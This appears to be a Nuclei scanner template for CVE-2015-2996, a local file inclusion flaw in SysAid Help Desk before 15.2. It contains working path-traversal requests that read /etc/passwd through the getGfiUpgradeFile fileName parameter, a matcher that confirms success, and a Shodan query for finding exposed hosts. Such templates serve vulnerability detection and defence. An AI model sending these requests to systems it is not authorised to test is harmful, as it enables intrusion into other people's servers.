id: CVE-2015-2996

info:
  name: SysAid Help Desk <15.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
  reference:
    - https://seclists.org/fulldisclosure/2015/Jun/8
    - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
    - http://seclists.org/fulldisclosure/2015/Jun/8
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2996
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-2996
    cwe-id: CWE-22
  metadata:
    max-request: 2
    shodan-query: http.favicon.hash:1540720428
  tags: cve,cve2015,sysaid,lfi,seclists

http:
  - method: GET
    path:
      - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
      - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by md on 2023/02/22